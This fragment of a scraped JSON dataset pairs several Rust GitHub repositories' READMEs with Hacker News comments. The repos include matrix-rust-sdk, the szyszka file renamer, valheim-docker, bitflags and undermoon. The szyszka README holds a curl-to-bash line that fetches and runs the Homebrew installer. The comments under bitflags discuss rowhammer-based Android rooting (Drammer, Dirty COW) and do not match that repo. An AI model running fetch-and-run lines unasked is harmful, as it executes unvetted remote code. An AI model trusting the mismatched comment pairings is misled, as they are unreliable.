is less precise than the pad placement, and this thing uses a base frame to align to the board edge. Pick and place machines align to reference marks on the board, using cameras. You might need some kind of fine screw adjustment to move the board very slightly.I've seen videos of the Liteplacer, which is a slow pick and place machine for prototypes. It's useful for when you are only making a very small number of boards, because it can work from components laid out in wells or on tape that's not on reels. The production oriented machines require that you have enough components on reels to get the feeders started.DirtyPCBs has never done me wrong, and they offer a cheap laser acrylic service, hmmm!http://dirtypcbs.com/store/lasercutSince I don't have a laser cutter (yet?): Would 3D printing the jig be feasible?Clever! I'm thinking a similar design with a range of hole sizes and wider borders could be a handy generic tool - might have to design and order one next time I'm making boards with QFNs.Does anyone here know what the smallest practical hole size is in acrylic?This is really cool. I wonder if it would make hand assembly worth it for small runs of products? PCBs are already so cheap that assembly is by far the biggest cost of making anything on a circuit board.What a great idea! Might be tricky to make this work with fine-pitch QFPs, but for QFN and wide-pitch ICs (e.g. SOIC) I can see this working really well.There are still dirt-cheap gadgets [1] that you can make before going for a liteplacer.[1] http://vpapanik.blogspot.com/2012/11/low-budget-manual-pick-...I don't get it. If you need 0.1mm accuracy, all the machining, on plastic, mind you, must be done to say 0.05mm accuracy, both in position and size. And, it appears that one of the parts registers to the edge of the pc board, which is inaccurate. Since you got it to work, what am I missing here?Nice, after doing a bit of electronics, I realize how much todays pcb work is unfit for hand soldering (unless you want to enjoy frustration). 
Having geometric help is never a waste.I guess the thing I don't understand is if you do this for some parts and not others (caps and resistors) how do you not smear their solder pasteUnrelated, but on the termdriver page, CSI codes C and D are labeled as both being \"cursor down\", when they should be \"cursor forward\" and \"cursor back\".Thank you! This will help a lot.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "matrix-org/matrix-rust-sdk", "link": "https://github.com/matrix-org/matrix-rust-sdk", "tags": ["matrix-org", "rust", "sdk"], "stars": 665, "description": "Matrix Client-Server SDK for Rust", "lang": "Rust", "repo_lang": "", "readme": "![Build Status](https://img.shields.io/github/actions/workflow/status/matrix-org/matrix-rust-sdk/ci.yml?style=flat-square)\n[![codecov](https://img.shields.io/codecov/c/github/matrix-org/matrix-rust-sdk/main.svg?style=flat-square)](https://codecov.io/gh/matrix-org/matrix-rust-sdk)\n[![License](https://img.shields.io/badge/License-Apache%202.0-yellowgreen.svg?style=flat-square)](https://opensource.org/licenses/Apache-2.0)\n[![#matrix-rust-sdk](https://img.shields.io/badge/matrix-%23matrix--rust--sdk-blue?style=flat-square)](https://matrix.to/#/#matrix-rust-sdk:matrix.org)\n[![Docs - Main](https://img.shields.io/badge/docs-main-blue.svg?style=flat-square)](https://matrix-org.github.io/matrix-rust-sdk/matrix_sdk/)\n[![Docs - Stable](https://img.shields.io/crates/v/matrix-sdk?color=blue&label=docs&style=flat-square)](https://docs.rs/matrix-sdk)\n\n# matrix-rust-sdk\n\n**matrix-rust-sdk** is an implementation of a [Matrix][] client-server library in [Rust][].\n\n[Matrix]: https://matrix.org/\n[Rust]: https://www.rust-lang.org/\n\n## Project structure\n\nThe rust-sdk consists of multiple crates that can be picked at your convenience:\n\n- **matrix-sdk** - High level client library, with batteries included, you're most likely\n interested in this.\n- **matrix-sdk-base** - No (network) IO client state machine that can be used to embed a\n Matrix client in your project or build a full fledged network enabled client\n lib on top of it.\n- **matrix-sdk-crypto** - No (network) IO encryption state machine that can be\n used to add Matrix E2EE support to your client or client library.\n\n## Minimum Supported Rust Version (MSRV)\n\nThese crates are built with the Rust language version 2021 and require a minimum compiler version of `1.65`.\n\n## Status\n\nThe library is in an alpha state, things that are implemented generally work but\nthe API will change in breaking ways.\n\nIf you are interested in using the matrix-sdk now is the time to try it out and\nprovide feedback.\n\n## Bindings\n\nSome crates of the **matrix-rust-sdk** can be embedded inside other\nenvironments, like Swift, Kotlin, JavaScript, Node.js etc. 
Please\nexplore the [`bindings/`](./bindings/) directory to learn more.\n\n## License\n\n[Apache-2.0](https://www.apache.org/licenses/LICENSE-2.0)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "qarmin/szyszka", "link": "https://github.com/qarmin/szyszka", "tags": ["rust", "linux", "gtk", "rename-files"], "stars": 664, "description": "Szyszka is a fast and powerful file renamer", "lang": "Rust", "repo_lang": "", "readme": "# Szyszka\n\nSzyszka is a simple but powerful and fast bulk file renamer.\n\n![Szyszka](https://user-images.githubusercontent.com/41945903/126200297-e0552164-2970-449f-9e68-bd47d231e041.png)\n## Features\n- Written in Rust\n- Available for Linux, Mac and Windows\n- Simple GUI created using GTK3\n- Multiple rules which can be freely combined:\n - Replace text\n - Trim text\n - Add text\n - Add numbers\n - Purge text\n - Change letters to upper/lowercase\n - Custom rules\n- Ability to edit, reorder rules and results\n- Handles even hundreds of thousands of records\n\n## Requirements\n### Linux\nYou need to install GTK (it should be available by default on most distributions) and the canberra-gtk-module.\n```shell\nsudo apt install libgtk3-dev libcanberra-gtk-module\n```\n### MacOS (not tested)\nYou need to install GTK using brew\n```shell\n/bin/bash -c \"$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\"\nbrew install rust gtk+3\n```\n\n### Windows\nThe released zip file contains all dependencies, so it works on Windows 7 SP1+. \nIf you want to, you can install the GTK runtime from https://github.com/tschoonj/GTK-for-Windows-Runtime-Environment-Installer/releases, ensure that its environment variables are set properly and run Szyszka from anywhere.\n\n## Installation\n### Precompiled Binaries\nAvailable at https://github.com/qarmin/szyszka/releases\n\n### Snap\nhttps://snapcraft.io/szyszka \n```\nsnap install szyszka\nsudo snap connect szyszka:removable-media # Allows Szyszka to see files on external devices\n```\n\n### Flatpak\nTODO\n\n### Cargo/Crates.io\nhttps://crates.io/crates/szyszka\n```\ncargo install szyszka\n```\n\n### Gentoo Linux\nszyszka is available on Gentoo's GURU overlay\n```\nemerge -av gui-apps/szyszka\n```\n\n## Future work\n- Adding Regex support\n- Saving/loading presets\n- Trim x number of characters\n\n## Contribution\nContributions are very welcome - bug reports, pull requests, testing etc. \nWhen creating or modifying existing rules, don't forget about updating/adding tests!\n\n## Name \nSzyszka is a Polish word which means pinecone.\n\nWhy such a strange name?\n\nWould you remember another app name like Rename Files Ultra? \nProbably not. \nBut will you remember the name Szyszka? \nWell... probably also not, but when you hear this name, you will instantly think of this app.\n\n## Why?\nI know that on Linux, which I primarily use, there are a lot of good file renamers (and even more on Windows), but I couldn't find any that would suit my needs.\nAvailable apps install a lot of dependencies, work slowly or just have a very bloated UI. 
\n\nIf you want very simple apps without too many features, look at [Bulky](https://github.com/linuxmint/bulky), [Thunar Bulk Rename](https://docs.xfce.org/xfce/thunar/bulk-renamer/start) or [Nautilus Renamer](https://launchpad.net/nautilus-renamer).\n\n## License\nMIT\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mbround18/valheim-docker", "link": "https://github.com/mbround18/valheim-docker", "tags": ["valheim", "rust", "odin", "docker", "kubernetes", "gaming", "valheim-docker", "cli", "timezone", "friendly", "user-friendly"], "stars": 664, "description": "Valheim Docker powered by Odin. The Valheim dedicated gameserver manager which is designed with resiliency in mind by providing automatic updates, world backup support, and a user friendly cli interface. ", "lang": "Rust", "repo_lang": "", "readme": "# [Valheim]\n\n[![All Contributors](https://img.shields.io/badge/all_contributors-11-orange.svg?style=flat-square)](#contributors-)\n\n\n## Table of Contents\n\n- [[Valheim]](#valheim)\n - [Table of Contents](#table-of-contents)\n - [Running on a bare-metal Linux Server](#running-on-a-bare-metal-linux-server)\n - [From Release](#from-release)\n - [From Source](#from-source)\n - [Running with Docker](#running-with-docker)\n - [Download Locations](#download-locations)\n - [DockerHub](#dockerhub)\n - [GitHub Container Registry](#github-container-registry)\n - [Environment Variables](#environment-variables)\n - [Container Env Variables](#container-env-variables)\n - [Auto Update](#auto-update)\n - [Auto Backup](#auto-backup)\n - [Docker Compose](#docker-compose)\n - [Simple](#simple)\n - [Everything but the kitchen sink](#everything-but-the-kitchen-sink)\n - [Bundled Tools](#bundled-tools)\n - [[Odin]](#odin)\n - [[Huginn] Http Server](#huginn-http-server)\n - [Feature Information](#feature-information)\n - [BepInEx Support](#bepinex-support)\n - [Webhook Support](#webhook-support)\n - [Guides](#guides)\n - [How to Transfer Files](#how-to-transfer-files)\n - [Additional Information](#additional-information)\n - [Discord Release Notifications](#discord-release-notifications)\n - [Versions](#versions)\n - [Sponsors](#sponsors)\n - [Contributors \u2728](#contributors-)\n > Did you write a guide? or perhaps an article? Add a PR to have it added here in the readme <3\n - [How to Transfer Files](#how-to-transfer-files)\n - [External: Hosting Valheim on Rocket Pi X](https://ikarus.sg/valheim-server-rock-pi-x/)\n - [External: Valheim on AWS](https://aws.amazon.com/getting-started/hands-on/valheim-on-aws/)\n - [External: How to host a dedicated Valheim server on Amazon Lightsail](https://updateloop.dev/dedicated-valheim-lightsail/)\n - [External: Experience With Valheim Game Hosting With Docker](https://norton-setup.support/games/experience-with-valheim-game-hosting-with-docker/)\n - [External: AWS Cloudformation template using Elastic Container Service with a Spot Instance for cost savings](https://github.com/apeabody/Valheim-AWS-ECS-Spot)\n- [Additional Information](#additional-information)\n - [Discord Release Notifications](#discord-release-notifications)\n - [Versions](#versions)\n- [\u2764\ufe0f Sponsors \u2764\ufe0f](#sponsors)\n- [\u2728 Contributors \u2728](#contributors-)\n\n## Running on a bare-metal Linux Server\n\n### From Release\n\n1. Navigate to `https://github.com/mbround18/valheim-docker/releases/latest`\n2. Download the `bundle.zip` to your server\n3. 
Extract the `bundle.zip`\n4. Make the files executable `chmod +x {odin,huginn}`\n5. Optional: Add the files to your path.\n6. Navigate to the folder where you want your server installed.\n7. Run `odin configure --password \"Your Super Strong Password\"` (you can also supply `--name \"Server Name\"`, `--port \"Server Port\"`, or other available arguments.)\n8. Finally, run `odin start`.\n\n**More in-depth How-to Article:** \n\n### From Source\n\nThis repo bundles its tools in a way that you can run them without having to install docker!\nIf you purely want to run this on a Linux based system, without docker, take a look at the links below <3\n\n- [Installing & Using Odin](./src/odin/README.md)\n The tool [Odin] runs the show and does almost all the heavy lifting in this repo. It starts, stops, and manages your Valheim server instance.\n- [Installing & Using Huginn](./src/huginn/README.md)\n Looking for a way to view the status of your server? Look no further than [Huginn]!\n The [Huginn] project is an http server built on the same source as [Odin] and uses these capabilities to expose a few http endpoints.\n\n> Using the binaries to run on an Ubuntu Server, you will have to be more involved and configure a few things manually.\n> If you want a managed, easy one-two punch to manage your server, then look at the Docker section <3\n\n## Running with Docker\n\n> This image does use version 3+ for all of its compose examples.\n> Please use Docker engine >=20 or make adjustments accordingly.\n>\n> [If you are looking for a guide on how to get started click here](https://github.com/mbround18/valheim-docker/discussions/28)\n>\n> Mod Support! It is supported to launch the server with BepInEx but!!!!! as a disclaimer! You take responsibility for debugging why your server won't start.\n> Modding is not supported by the Valheim developers officially yet, which means you WILL run into errors. This repo has been tested with running ValheimPlus as a test mod and does not have any issues.\n> See [Getting started with mods]\n\n### Download Locations\n\n#### DockerHub\n\n[DockerHub badges]\n\n#### GitHub Container Registry\n\n[GHCR badges]\n\n### Environment Variables\n\n> See further on down for advanced environment variables.\n\n| Variable | Default | Required | Description |\n| -------- | ------- | -------- | ----------- |\n| PORT | `2456` | TRUE | Sets the port your server will listen on. Take note it will also listen on +2 (ex: 2456, 2457, 2458) |\n| NAME | `Valheim Docker` | TRUE | The name of your server! Make it fun and unique! |\n| WORLD | `Dedicated` | TRUE | This is used to generate the name of your world. |\n| PUBLIC | `1` | FALSE | Sets whether or not your server is public on the server list. |\n| PASSWORD | `` | TRUE | Set this to something unique! |\n| ENABLE_CROSSPLAY | `0` | FALSE | Enable crossplay support as of `Valheim Version >0.211.8` |\n| TYPE | `Vanilla` | FALSE | This can be set to `ValheimPlus`, `BepInEx`, `BepInExFull` or `Vanilla` |\n| MODS | `` | FALSE | This is an array of mods separated by comma and a new line. [Click Here for Examples](./docs/tutorials/getting_started_with_mods.md) Supported files are `zip`, `dll`, and `cfg`. 
|\n| WEBHOOK_URL | `` | FALSE | Supply this to get information regarding your server's status in a webhook or Discord notification! [Click here to learn how to get a webhook url for Discord](https://help.dashe.io/en/articles/2521940-how-to-create-a-discord-webhook-url) |\n| WEBHOOK_INCLUDE_PUBLIC_IP | `0` | FALSE | Optionally include your server's public IP in webhook notifications, useful if not using a static IP address. NOTE: If your server is behind a NAT using PAT with more than one external IP address (very unlikely on a home network), this could be inaccurate if your NAT doesn't maintain your server to a single external IP. |\n| UPDATE_ON_STARTUP | `1` | FALSE | Tries to update the server when the container is started. |\n| ADDITIONAL_STEAMCMD_ARGS | `` | FALSE | Sets optional arguments for install |\n\n#### Container Env Variables\n\n| Variable | Default | Required | Description |\n| -------- | ------- | -------- | ----------- |\n| TZ | `America/Los_Angeles` | FALSE | Sets what timezone your container is running on. This is used for timestamps and cron jobs. [Click Here for which timezones are valid.](https://en.wikipedia.org/wiki/List_of_tz_database_time_zones) |\n| PUID | `1000` | FALSE | Sets the User Id of the steam user. |\n| PGID | `1000` | FALSE | Sets the Group Id of the steam user. |\n\n#### Auto Update\n\n| Variable | Default | Required | Description |\n| -------- | ------- | -------- | ----------- |\n| AUTO_UPDATE | `0` | FALSE | Set to `1` if you want your container to auto update! This means at the times indicated by `AUTO_UPDATE_SCHEDULE` it will check for server updates. If there is an update then the server will be shut down, updated, and brought back online if the server was running before. |\n| AUTO_UPDATE_SCHEDULE | `0 1 * * *` | FALSE | This works in conjunction with `AUTO_UPDATE` and sets the schedule to which it will run an auto update. [If you need help figuring out a cron schedule click here] |\n| AUTO_UPDATE_PAUSE_WITH_PLAYERS | `0` | FALSE | Does not process an update for the server if there are players online. |\n\nThe auto update job queries Steam and compares it against your internal Steam files for a differential in version numbers.\n\n#### Auto Backup\n\n| Variable | Default | Required | Description |\n| -------- | ------- | -------- | ----------- |\n| AUTO_BACKUP | `0` | FALSE | Set to `1` to enable auto backups. Backups are stored under `/home/steam/backups` which means you will have to add a volume mount for this directory. |\n| AUTO_BACKUP_SCHEDULE | `*/15 * * * *` | FALSE | Change to set how frequently you would like the server to backup. [If you need help figuring out a cron schedule click here]. 
|\n| AUTO_BACKUP_NICE_LEVEL | `NOT SET` | FALSE | [Do NOT set this variable unless you are following this guide here](https://github.com/mbround18/valheim-docker/discussions/532) |\n| AUTO_BACKUP_REMOVE_OLD | `1` | FALSE | Set to `0` to keep all backups or manually manage them. |\n| AUTO_BACKUP_DAYS_TO_LIVE | `3` | FALSE | This is the number of days you would like to keep backups for. While backups are compressed and generally small it is best to change this number as needed. |\n| AUTO_BACKUP_ON_UPDATE | `0` | FALSE | Create a backup right before updating and starting your server. |\n| AUTO_BACKUP_ON_SHUTDOWN | `0` | FALSE | Create a backup on shutdown. |\n| AUTO_BACKUP_PAUSE_WITH_NO_PLAYERS | `0` | FALSE | Will skip creating a backup if there are no players. `PUBLIC` must be set to `1` for this to work! |\n\nThe auto backup job produces a `*.tar.gz` file, which should average around 30 MB for a world that has an average of 4 players consistently building on it. You should be aware that if you place the server folder in your saves folder, your backups could become astronomical in size. This is a common problem that others have observed; to avoid it, please follow the guide for how volume mounts should be made in the `docker-compose.yml`.\n\n#### Scheduled Restarts\n\nScheduled restarts allow the operator to trigger restarts on a cron job.\n\n| Variable | Default | Required | Description |\n| -------- | ------- | -------- | ----------- |\n| SCHEDULED_RESTART | `0` | FALSE | Allows you to enable scheduled restarts |\n| SCHEDULED_RESTART_SCHEDULE | `0 2 * * *` | FALSE | Defaults to every day at 2 am but can be configured with valid cron |\n\n## Docker Compose\n\n> This image does use version 3+ for all of its compose examples.\n> Please use Docker engine >=20 or make adjustments accordingly.\n\n### Simple\n\n> This is a basic example of a docker compose, you can apply any of the variables above to the `environment` section below but be sure to follow each variable's description notes!\n\n```yaml\nversion: \"3\"\nservices:\n  valheim:\n    image: mbround18/valheim:latest\n    stop_signal: SIGINT\n    ports:\n      - \"2456:2456/udp\"\n      - \"2457:2457/udp\"\n      - \"2458:2458/udp\"\n    environment:\n      PORT: 2456\n      NAME: \"Created With Valheim Docker\"\n      WORLD: \"Dedicated\"\n      PASSWORD: \"Banana Phone\"\n      TZ: \"America/Chicago\"\n      PUBLIC: 1\n    volumes:\n      - ./valheim/saves:/home/steam/.config/unity3d/IronGate/Valheim\n      - ./valheim/server:/home/steam/valheim\n```\n\n### Everything but the kitchen sink\n\n```yaml\nversion: \"3\"\nservices:\n  valheim:\n    image: mbround18/valheim:latest\n    stop_signal: SIGINT\n    ports:\n      - \"2456:2456/udp\"\n      - \"2457:2457/udp\"\n      - \"2458:2458/udp\"\n    environment:\n      PORT: 2456\n      NAME: \"Created With Valheim Docker\"\n      WORLD: \"Dedicated\"\n      PASSWORD: \"Strong! 
Password @ Here\"\n      TZ: \"America/Chicago\"\n      PUBLIC: 1\n      AUTO_UPDATE: 1\n      AUTO_UPDATE_SCHEDULE: \"0 1 * * *\"\n      AUTO_BACKUP: 1\n      AUTO_BACKUP_SCHEDULE: \"*/15 * * * *\"\n      AUTO_BACKUP_REMOVE_OLD: 1\n      AUTO_BACKUP_DAYS_TO_LIVE: 3\n      AUTO_BACKUP_ON_UPDATE: 1\n      AUTO_BACKUP_ON_SHUTDOWN: 1\n      WEBHOOK_URL: \"https://discord.com/api/webhooks/IM_A_SNOWFLAKE/AND_I_AM_A_SECRET\"\n      WEBHOOK_INCLUDE_PUBLIC_IP: 1\n      UPDATE_ON_STARTUP: 0\n    volumes:\n      - ./valheim/saves:/home/steam/.config/unity3d/IronGate/Valheim\n      - ./valheim/server:/home/steam/valheim\n      - ./valheim/backups:/home/steam/backups\n```\n\n## Bundled Tools\n\n### [Odin]\n\nThis repo has a CLI tool called [Odin] in it! It is used for managing the server inside the container. If you are looking for instructions for it click here: [Odin]\n\n[Click here to see advanced environment variables for Odin](src/odin/README.md)\n\n### [Huginn] Http Server\n\n| Variable | Default | Required | Description |\n| -------- | ------- | -------- | ----------- |\n| ADDRESS | `Your Public IP` | FALSE | This setting is used in conjunction with `odin status` and setting this will stop `odin` from trying to fetch your public IP |\n| HTTP_PORT | `anything above 1024` | FALSE | Setting this will spin up a little http server that provides two endpoints for you to call. |\n\n- `/metrics` provides a Prometheus-style metrics output.\n- `/status` provides a more traditional status page.\n\n> Note on `ADDRESS`: this can be set to `127.0.0.1:<port>` or `<ip>:<port>` but does not have to be set. If it is set, it will prevent odin from reaching out to the aws ip service to ask for your public IP address. Keep in mind, your query port is +1 of what you set in the `PORT` env variable for your valheim server.\n\n> Another note: your server MUST be public (eg. `PUBLIC=1`) in order for Odin+Huginn to collect and report statistics.\n\n## Feature Information\n\n### [BepInEx Support](./docs/bepinex.md)\n\nAs of [March 2021](./docs/bepinex.md) the TYPE variable can be used to automatically install BepInEx. For details see [Getting started with mods].\n\n### [Webhook Support](./docs/webhooks.md)\n\nThis repo can automatically send notifications to discord via the WEBHOOK_URL variable.\nOnly use the documentation link below if you want advanced settings!\n\n[Click Here to view documentation on Webhook Support](./docs/webhooks.md)\n\n## Guides\n\n### [How to Transfer Files](./docs/tutorials/how-to-transfer-files.md)\n\nThis is a tutorial on a recommended path for transferring files. This can be done to transfer world files between hosts, transfer BepInEx configs, or even to transfer backups.\n\n[Click Here to view the tutorial of how to transfer files.](./docs/tutorials/how-to-transfer-files.md)\n\n## Additional Information\n\n### Discord Release Notifications\n\nIf you would like to have release notifications tied into your Discord server, click here:\n\n[Discord badge]\n\n**Note**: The discord is PURELY for release notifications and any + all permissions involving sending chat messages have been disabled.\n[Any support for this repository must take place on the Discussions.](https://github.com/mbround18/valheim-docker/discussions)\n\n### Versions\n\n- latest (Stable): Mod support! 
and cleaned up the code base.\n- 1.4.x (Stable): Webhook for discord upgrade.\n- 1.3.x (Stable): Health of codebase improvements.\n- 1.2.0 (Stable): Added additional stop features and sig for stopping.\n- 1.1.1 (Stable): Patch to fix arguments\n- 1.1.0 (Unstable): Cleaned up image and made it faster\n- 1.0.0 (Stable): It works!\n\n[//]: <> (Links below...................)\n[Odin]: src/odin/README.md\n[Huginn]: src/huginn/README.md\n[Valheim]: https://www.valheimgame.com/\n[Getting started with mods]: ./docs/tutorials/getting_started_with_mods.md\n[If you need help figuring out a cron schedule click here]: https://crontab.guru/#0_1_*_*_*\n\n[//]: <> (Image Base Url: https://github.com/mbround18/valheim-docker/blob/main/docs/assets/name.png?raw=true)\n\n## Sponsors\n\n\n## Contributors \u2728\n\nThanks goes to these wonderful people ([emoji key](https://allcontributors.org/docs/en/emoji-key)):\n\n
\"\"/
Mark

\ud83d\udcd6
\"\"/
Michael

\ud83d\ude87 \ud83d\udcbb \ud83d\udcd6
\"\"/
imgbot[bot]

\ud83d\udcd6
\"\"/
Jonathan Boudreau

\ud83d\udcbb
\"\"/
Luk\u00e1\u0161 Hru\u0161ka

\ud83d\udcd6
\"\"/
Julian Vall\u00e9e

\ud83d\udcbb
\"\"/
Finomnis

\ud83d\udcbb
\"\"/
Justin Byrne

\ud83d\udcd6
\"\"/
Andrew Peabody

\ud83d\udcd6 \ud83d\udcbb
\"\"/
Jorge Morales

\ud83d\udcbb
\"\"/
Spanner_Man

\ud83d\udcd6
\n\n\n\n\n\n\nThis project follows the [all-contributors](https://github.com/all-contributors/all-contributors) specification. Contributions of any kind welcome!\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "bitflags/bitflags", "link": "https://github.com/bitflags/bitflags", "tags": ["bitflags", "structures", "macros"], "stars": 664, "description": "A macro to generate structures which behave like bitflags", "lang": "Rust", "repo_lang": "", "readme": "bitflags\n========\n\n[![Rust](https://github.com/bitflags/bitflags/workflows/Rust/badge.svg)](https://github.com/bitflags/bitflags/actions)\n[![Latest version](https://img.shields.io/crates/v/bitflags.svg)](https://crates.io/crates/bitflags)\n[![Documentation](https://docs.rs/bitflags/badge.svg)](https://docs.rs/bitflags)\n![License](https://img.shields.io/crates/l/bitflags.svg)\n\nA Rust macro to generate structures which behave like a set of bitflags\n\n- [Documentation](https://docs.rs/bitflags)\n- [Release notes](https://github.com/bitflags/bitflags/releases)\n\n## Usage\n\nAdd this to your `Cargo.toml`:\n\n```toml\n[dependencies]\nbitflags = \"2.0.0-rc.2\"\n```\n\nand this to your source code:\n\n```rust\nuse bitflags::bitflags;\n```\n\n## Example\n\nGenerate a flags structure:\n\n```rust\nuse bitflags::bitflags;\n\n// The `bitflags!` macro generates `struct`s that manage a set of flags.\nbitflags! {\n #[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord, Hash)]\n struct Flags: u32 {\n const A = 0b00000001;\n const B = 0b00000010;\n const C = 0b00000100;\n const ABC = Self::A.bits | Self::B.bits | Self::C.bits;\n }\n}\n\nfn main() {\n let e1 = Flags::A | Flags::C;\n let e2 = Flags::B | Flags::C;\n assert_eq!((e1 | e2), Flags::ABC); // union\n assert_eq!((e1 & e2), Flags::C); // intersection\n assert_eq!((e1 - e2), Flags::A); // set difference\n assert_eq!(!e2, Flags::A); // set complement\n}\n```\n\n## Rust Version Support\n\nThe minimum supported Rust version is 1.46 due to use of associated constants and const functions.\n", "readme_type": "markdown", "hn_comments": "I first read bout this a few months ago. Coming from a hardware background I was particularly struck by how damned clever this is!Dumb question (maybe OT): why is rooting phones so hard in the first place? Shouldn't root permissions be part of device ownership (akin to fair use)? Why do I have to hack my own phone to get unfettered access?Rowhammer was first presented in 2014https://en.wikipedia.org/wiki/Row_hammer> In a statement, Google officials wrote: \"After researchers reported this issue to our Vulnerability Rewards Program, we worked closely with them to deeply understand it in order to better secure our users. We\u2019ve developed a mitigation which we will include in our upcoming November security bulletin.\"Then why am I reading about this in October?So, the proof of concept code is at https://github.com/vusec/drammer . Can we get a reliable rooting tool based on this?This hardware defect just keeps on giving.Since we're unlikely to see larger memory cells again, mitigations will likely be applied. There is a good question on a discussion board [1] from last year about memory scrambling and its utility here; but with no responses. Can these questions be answered? 
Some points about memory scrambling are also made here [2] by Kim of the 2014 CMU paper.[1] https://groups.google.com/forum/#!topic/rowhammer-discuss/tp...[2] https://github.com/CMU-SAFARI/rowhammerVery interesting application of the rowhammer. Funny that it comes at the same time http://dirtycow.ninja allows us to write very reliable and portable exploits (which should be applicable to Android).There's something about Rowhammer that warms the cockles of my heart.So any bets on when a jailbreak based on this is developed?Interesting. This is not something that has a simple fix and can be patched. The arms race continues.Or we could end it and give users (limited) root access to their stock phones. Let us run OCI containers with restricted root user accounts. Bind mount certain filesystems given the correct Android permissions, such as the SD card or internal storage, or the user's emulated root. Or supported nested ARM virtualization.Modern Linux supports a uid 0 with less than complete access in a cgroup, using the LSM to regulate specific capabilities, or creating the cgroup with limited caps to begin with.Make access to areas the carrier considers sensitive conditional on a capability, or limit access to the full video decode hardware or shared memory from this root jail.I have been able to compile but not run the runc binary from OCI/docker/rkt. Nested cgroupfs would solve a lot of these restrictions.> It's not uncommon for different generations of the same phone model to use different memory chips.Actually the same generation of the same phone can use different memory chips and be produced by different manufacturers. It's very common for Apple and Samsung where they can't source enough parts from a single manufacturer.Is there any way to statically analyze an app for code that might be attempting to execute a rowhammer attack? I'd imagine that rowhammer requires a tight loop doing nothing but writing to the same value in memory repeatedly, or something similarly recognizable. Such a tool could be used to at least keep any malicious apps out of the play store. It would probably be fine if it sometimes gave false positives on innocuous code that a human (at Google) could override after inspecting the suspect code.On the one hand, you could argue that this is not a good thing because the hardware is fundamentally buggy. On the other hand, and this may be a bit of a contrarian view, if it leads to \"the insecurity that gives us freedom\", maybe it's not all so bad after all... although in this case, it might be too much of a free-for-all. 
But given how locked-down mobile devices are by default, this almost feels like a breath of fresh air.https://www.gnu.org/philosophy/right-to-read.en.htmlhttp://boingboing.net/2012/01/10/lockdown.htmlhttp://boingboing.net/2012/08/23/civilwar.htmlPerhaps we'll finally start being able to get mobile devices with ECC memory, now that its useful for preventing the nominal owners of devices from having actual control or visibility into their operation.I never heard of Thunderclap before, maybe this is a viral campaign to advertise a viral campaigning tool.Anyhow, Antiviral is a pretty good movie.https://en.wikipedia.org/wiki/Antiviral_(film)Shame this didn't make it to the front page...", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "doyoubi/undermoon", "link": "https://github.com/doyoubi/undermoon", "tags": ["redis", "redis-cluster", "rust", "proxy", "slot", "migration", "redis-clusters", "redis-instances", "redis-protocol", "redis-proxy", "failover", "scale", "redis-cloud", "cloud", "kubernetes", "k8s", "redis-cluster-protocol"], "stars": 663, "description": "Mordern Redis Cluster solution for easy operation.", "lang": "Rust", "repo_lang": "", "readme": "![undermoon logo](docs/undermoon-logo.svg)\n\n# Undermoon ![Continuous Integration](https://github.com/doyoubi/undermoon/workflows/Continuous%20Integration/badge.svg?event=push)\n`Undermoon` is a self-managed Redis clustering system based on **Redis Cluster Protocol** supporting:\n\n- Horizontal scalability and high availability\n- Cluster management through HTTP API\n- Automatic failover for both master and replica\n- Fast scaling\n\nAny storage system implementing redis protocol could also somehow work with undermoon,\nsuch as [KeyDB](https://github.com/JohnSully/KeyDB).\n\nFor more in-depth explanation of Redis Cluster Protocol and how Undermoon implement it,\nplease refer to [Redis Cluster Protocol](./docs/redis_cluster_protocol.md).\n\n## Architecture\n![architecture](docs/architecture.svg)\n##### Metadata Storage\nMetadata storage stores all the metadata of the whole `undermoon` cluster,\nincluding existing Redis instances, proxies, and exposed Redis clusters.\nNow it's an in-memory storage server called `Memory Broker`.\nWhen using [undermoon-operator](https://github.com/doyoubi/undermoon-operator),\nthis `Memory Broker` will change to use `ConfigMap` to store the data.\n\n##### Coordinator\nCoordinator will synchronize the metadata between broker and server proxy.\nIt also actively checks the liveness of server proxy and initiates failover.\n\n##### Storage Cluster\nThe storage cluster consists of server proxies and Redis instances.\nIt serves just like the official Redis Cluster to the applications.\nA Redis Cluster Proxy could be added between it and applications\nso that applications don't need to upgrade their Redis clients to smart clients.\n\n###### Chunk\nChunk is the smallest building block of every single exposed Redis Cluster.\nEach chunk consists of 4 Redis instances and 2 server proxies evenly distributed in two different physical machines.\nSo the node number of each Redis cluster will be the multiples of 4 with half masters and half replicas.\n\nThe design of chunk makes it very easy to build a cluster with a good topology for **workload balancing**.\n\n## Getting Started\n### Run Undermoon in Kubernetes\nUsing [undermoon-operator](https://github.com/doyoubi/undermoon-operator)\nis the easiest way to create Redis clusters if you have Kubernetes.\n\n```\nhelm install 
my-undermoon-operator undermoon-operator-.tgz\n\nhelm install \\\n --set 'cluster.clusterName=my-cluster-name' \\\n --set 'cluster.chunkNumber=2' \\\n --set 'cluster.maxMemory=2048' \\\n --set 'cluster.port=5299' \\\n my-cluster \\\n -n my-namespace \\\n undermoon-cluster-.tgz\n```\n\nSee the `README.md` of [undermoon-operator](https://github.com/doyoubi/undermoon-operator)\nfor how to use it.\n\n### Run Undermoon Using Docker Compose\nSee [docker compose example](./docs/docker_compose_example.md).\n\n### Setup Undermoon Manually\nOr you can set them up without docker following this docs: [setting up undermoon manually](docs/set_up_manually.md).\n\n## Development\n`undermoon` tries to avoid `unsafe` and some calls that could crash like `unwrap`.\n\nRun the following commands before committing your codes:\n```\n$ make lint\n$ make test\n```\n\nSee more in the [development guide](./docs/development.md).\n\n## Documentation\n- [Redis Cluster Protocol and Server Proxy](./docs/redis_cluster_protocol.md)\n- [Chunk](./docs/chunk.md)\n- [Slot Migration](./docs/slots_migration.md)\n- [Memory Broker Replica](./docs/mem_broker_replica.md)\n- [Configure to support non-cluster-mode clients](./docs/active_redirection.md)\n- [Command Table](./docs/command_table.md)\n- [Performance](./docs/performance.md)\n- [Best Practice](./docs/best_practice.md)\n- [Broker External Storage](./docs/broker_external_storage.md)\n\n## API\n- [Proxy UMCTL command](./docs/meta_command.md)\n- [HTTP Broker 